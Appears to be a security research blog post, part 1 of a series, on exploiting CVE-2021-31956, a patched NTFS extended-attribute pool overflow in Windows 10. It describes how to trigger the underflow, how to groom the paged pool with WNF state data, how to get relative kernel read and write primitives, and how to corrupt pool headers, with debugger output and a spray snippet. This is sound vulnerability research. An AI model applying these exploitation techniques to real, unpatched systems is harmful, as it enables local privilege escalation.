🔒
There are new articles available, click to refresh the page.
✇NCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

By: Alex Plaskett

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This lead to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, lets assume the following: There are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 < out_buf_length - 0, data would be copied into the buffer. We will use 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario when we have the following setup if we could have the out_buf_length of 18.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 137

In the resulting check will be:

ea_block_size <= out_buf_length - padding

137 <= 0 - 2

And at this point we have underflowed the check and 137 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers for NtfsCommonQueryEa we can see that we can see that NtQueryEaFile system call path triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in the kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described as above.

In order to do trigger the underflow, we need to set our output buffer size to be length of the first Ea Block.

Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.

The interesting things from this vulnerability from an attacker perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.

There is then the padding length of 2, with the second extended attribute starting at 20 offset.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile. It is then necessary to trigger the vulnerable code path to act on them by setting the outbuffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There has been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.

Firstly the important thing to understand is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine what heap structure in which the chunk lives on from the four “backends”:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of sized 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation fitting being below 0x200.

We can step through the corruption of the adjacent chunk occurring by settings a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk initially and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true, however, demonstrates that even with more restricted attacker constraints these can often be worked around and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facitily is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF related structures used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value 16 (the 0x10-byte header prepended).

Therefore, we have (0x10-bytes of _POOL_HEADER) header as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with data of a controlled size and data, and we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up free’ing our allocation.

Whilst researching this area, I was able to reuse the free’d chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists as in my case from empirical testing, then I did not seem to be hitting this after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data, itself and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that the both the NTFS vulnerable chunk and the WNF chunk can be positioned with other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point its worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique then it opens up the ability to read data, modify certain parts of it and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption lead to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is free’d using our controlled free, we can force the chunks address to be stored within the wrong lookaside list for the size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
